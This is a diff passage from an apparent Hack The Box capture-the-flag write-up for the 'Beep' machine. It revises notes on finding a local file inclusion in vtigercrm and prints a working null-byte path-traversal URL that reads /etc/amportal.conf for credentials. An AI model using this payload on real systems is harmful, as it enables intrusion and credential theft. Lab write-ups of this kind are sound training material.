thomaslaurenson/trophyroom/hackthebox/machines/beep/README.md

 grep -rin  'vtigercrm' . | grep "00"
 ```

-The idea of the null byte `grep` search was to find other LFI vulnerabilities in different software known to be on the target - and seeing what files they dumped as a PoC.
+The idea of this method was to look for other LFI exploits and see what files they dumped.
+And the idea of the null byte `grep` search was to find other LFI paths in different software known to be on the target.
 The final result was an LFI to a useful file:

 ```none
 view-source:https://beep.htb/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/amportal.conf%00
 ```

-This file was gold - and contained some credential:
+This file was gold - and contained some useful credentials:

 ```none
 AMPDBHOST=localhost